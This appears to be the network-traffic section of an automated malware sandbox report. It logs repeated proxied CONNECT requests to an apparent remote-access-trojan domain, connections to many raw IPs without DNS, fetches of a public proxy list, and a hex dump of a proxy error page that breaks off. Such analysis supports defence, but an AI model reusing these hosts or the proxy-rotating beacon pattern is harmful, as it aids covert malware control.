                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 197.234.13.97
                Source: unknownTCP traffic detected without corresponding DNS query: 154.73.29.1
                Source: unknownTCP traffic detected without corresponding DNS query: 50.231.104.58
                Source: unknownTCP traffic detected without corresponding DNS query: 162.241.158.204
                Source: unknownTCP traffic detected without corresponding DNS query: 51.222.241.8
                Source: unknownTCP traffic detected without corresponding DNS query: 177.38.5.42
                Source: unknownTCP traffic detected without corresponding DNS query: 206.189.145.23
                Source: unknownTCP traffic detected without corresponding DNS query: 212.102.47.83
                Source: unknownTCP traffic detected without corresponding DNS query: 101.255.165.130
                Source: unknownTCP traffic detected without corresponding DNS query: 211.174.114.225
                Source: unknownTCP traffic detected without corresponding DNS query: 124.223.186.186
                Source: unknownTCP traffic detected without corresponding DNS query: 1.20.184.75
                Source: unknownTCP traffic detected without corresponding DNS query: 119.3.215.41
                Source: unknownTCP traffic detected without corresponding DNS query: 212.237.218.68
                Source: unknownTCP traffic detected without corresponding DNS query: 41.60.232.18
                Source: unknownTCP traffic detected without corresponding DNS query: 197.234.13.27
                Source: unknownTCP traffic detected without corresponding DNS query: 190.97.238.94
                Source: unknownTCP traffic detected without corresponding DNS query: 27.123.1.35
                Source: unknownTCP traffic detected without corresponding DNS query: 51.250.13.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.216.144.170
                Source: unknownTCP traffic detected without corresponding DNS query: 84.36.23.44
                Source: unknownTCP traffic detected without corresponding DNS query: 83.143.24.66
                Source: unknownTCP traffic detected without corresponding DNS query: 45.65.138.48
                Source: unknownTCP traffic detected without corresponding DNS query: 41.33.203.231
                Source: unknownTCP traffic detected without corresponding DNS query: 86.206.214.11
                Source: unknownTCP traffic detected without corresponding DNS query: 186.103.130.94
                Source: unknownTCP traffic detected without corresponding DNS query: 103.149.194.40
                Source: unknownTCP traffic detected without corresponding DNS query: 94.131.63.120
                Source: unknownTCP traffic detected without corresponding DNS query: 186.96.95.205
                Source: unknownTCP traffic detected without corresponding DNS query: 150.230.96.150
                Source: unknownTCP traffic detected without corresponding DNS query: 209.14.112.3
                Source: unknownTCP traffic detected without corresponding DNS query: 177.131.29.213
                Source: unknownTCP traffic detected without corresponding DNS query: 131.100.48.233
                Source: unknownTCP traffic detected without corresponding DNS query: 104.16.104.12
                Source: unknownTCP traffic detected without corresponding DNS query: 203.96.177.211
                Source: unknownTCP traffic detected without corresponding DNS query: 188.165.213.106
                Source: unknownTCP traffic detected without corresponding DNS query: 223.113.89.138
                Source: unknownTCP traffic detected without corresponding DNS query: 46.101.19.131
                Source: unknownTCP traffic detected without corresponding DNS query: 104.25.167.88
                Source: unknownTCP traffic detected without corresponding DNS query: 103.5.127.213
                Source: unknownTCP traffic detected without corresponding DNS query: 165.227.196.37
                Source: unknownTCP traffic detected without corresponding DNS query: 103.178.194.190
                Source: unknownTCP traffic detected without corresponding DNS query: 61.129.2.212
                Source: unknownTCP traffic detected without corresponding DNS query: 47.243.177.21
                Source: unknownTCP traffic detected without corresponding DNS query: 41.65.236.37
                Source: unknownTCP traffic detected without corresponding DNS query: 18.144.77.146
                Source: unknownTCP traffic detected without corresponding DNS query: 198.49.68.80
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: github.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:12 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 